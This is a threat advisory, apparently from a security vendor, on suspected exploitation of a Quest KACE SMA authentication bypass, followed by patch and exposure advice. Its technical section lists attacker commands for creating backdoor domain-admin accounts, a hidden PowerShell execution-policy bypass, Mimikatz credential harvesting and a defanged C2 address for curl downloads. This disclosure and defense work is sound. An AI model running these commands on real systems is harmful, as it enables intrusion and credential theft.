CVE-2025-32975
Starting the week of March 9, 2026, Arctic Wolf observed malicious activity in customer environments potentially linked to the exploitation of CVE-2025-32975 on unpatched Quest KACE Systems Management Appliance (SMA) instances that were publicly exposed to the internet. This vulnerability was patched in May 2025. Quest KACE SMA is an on-premises appliance for centralized endpoint management, providing inventory, software deployment, patching, and endpoint monitoring capabilities.
CVE-2025-32975 is a critical authentication bypass vulnerability that allows threat actors to impersonate legitimate users without valid credentials. The flaw exists in the SSO authentication handling mechanism and can result in complete administrative takeover.
Arctic Wolf is not aware of any reports of exploitation of CVE‑2025‑32975 and has not identified a publicly available proof-of-concept. Additionally, we found no evidence that related vulnerabilities (CVE‑2025‑32976, CVE‑2025‑32977, and CVE‑2025‑32978), which were patched alongside CVE‑2025‑32975 in May 2025, were leveraged in this activity.
Technical Details
Initial access was suspected via CVE-2025-32975, as threat actors achieved administrative takeover shortly after. Observed activity included the following:
Execution / Initial Access
- Exploited KPluginRunProcess functionality in KACE to execute remote commands.
- Analysis of KACE logs revealed Base64-encoded payloads.
- Downloaded files via curl from 216[.]126[.]225[.]156 to establish command-and-control communication.
Persistence
- Created additional administrative accounts via runkbot.exe (Quest KACE process) and attempted to add them to administrative groups:
- net localgroup administrators ooo1 /add
- net group “domain admins” ooo2 /add
- Executed PowerShell scripts in a bypassed and hidden context:
- powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File “C:\temp\Enable-UpdateServices.ps1”
- Registry modifications via taskband.ps1 for potential persistence or system configuration changes.
Credential Access
- Credential harvesting using Mimikatz, including one instance disguised as asd.exe.
Discovery
- Local system enumeration:
- quser.exe – enumerate logged-in users
- net localgroup administrators – list admin accounts
- net user – enumerate all user accounts
- Domain administrative structure enumeration:
- net group “domain admins” /domain > c:\1.txt
- net group “domain controllers” /domain >> c:\1.txt
- Network and domain discovery:
- net time /domain > c:\1.txt
- net group “domain controllers” /domain
Lateral Movement
- Gained RDP access to backup infrastructure (Veeam, Veritas) and domain controllers.
Recommendations for CVE-2025-32975
Upgrade to Latest Fixed Version
Arctic Wolf strongly recommends that customers upgrade to the latest fixed version.
| Product | Affected Version | Fixed Version |
| Quest KACE SMA | · 13.0.x before 13.0.385
· 13.1.x before 13.1.81 · 13.2.x before 13.2.183 · 14.0.x before 14.0.341 (Patch 5) · 14.1.x before 14.1.101 (Patch 4) |
· Version 13.0.385 or later
· Version 13.1.81 or later · Version 13.2.183 or later · Version 14.0.341 (Patch 5) or later · Version 14.1.101 (Patch 4) or later |
Please follow your organization’s patching and testing guidelines to minimize potential operational impact.
Remove Publicly Exposed Instances of KACE SMA From the Internet
Arctic Wolf strongly recommends that KACE SMA instances not be exposed to the public internet. If remote access is required, it should be restricted through a VPN or firewall.
As a security best practice, we advise keeping these types of products including those from other vendors, non-internet-facing unless absolutely necessary.
